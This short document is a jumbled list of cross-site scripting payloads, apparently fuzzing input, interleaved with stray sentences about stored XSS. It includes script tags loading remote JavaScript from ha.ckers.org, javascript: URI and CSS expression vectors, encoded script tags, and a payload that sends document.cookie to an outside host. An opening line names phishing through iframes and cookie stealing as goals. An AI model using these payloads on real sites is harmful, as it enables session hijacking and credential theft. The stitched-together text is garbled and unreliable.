`"'> Actions: phising through iframe, cookie stealing, always try convert self to reflected. <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> , <;IMG SRC=";javascript:alert(';XSS';)"; <A HREF="//www.google.com/">XSS</A> & test [endif]--> The information in this article is not new. XXX test <DIV STYLE="background-image: url(javascript:alert('XSS'))"> But it is also possible for the server to store the attacker-supplied input (the XSS payload) and serve it to the victim at a later time. javascript:alert(1); "`'> test "`'> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>

X test http://www."> <;SCRIPT SRC=//ha.ckers.org/.j>; <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> \";document.vulnerable=true;;// "`'> javascript:alert(1)